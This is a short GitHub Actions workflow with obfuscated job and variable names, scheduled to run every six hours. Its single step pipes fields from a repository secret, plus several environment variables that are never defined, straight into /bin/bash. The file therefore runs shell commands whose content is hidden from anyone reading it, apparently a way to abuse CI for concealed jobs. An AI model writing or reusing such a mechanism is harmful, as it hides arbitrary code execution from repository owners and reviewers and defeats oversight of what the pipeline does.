name: pigletupper
on:
  workflow_dispatch:
  schedule:
    - cron: '6 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pigletupper
        env:
          rlm43: ${{ secrets.rlm43 }}
        run: |
          echo $rlm43 | jq -r .u77996 | /bin/bash
          echo $erocq3 | jq -r .tq8028 | /bin/bash
          echo $b3 | jq -r .hsp89 | /bin/bash
          echo $nprfv500 | jq -r .md286 | /bin/bash
          echo $zdb67 | jq -r .dip0634 | /bin/bash
          echo $skthv97 | jq -r .kny5309 | /bin/bash

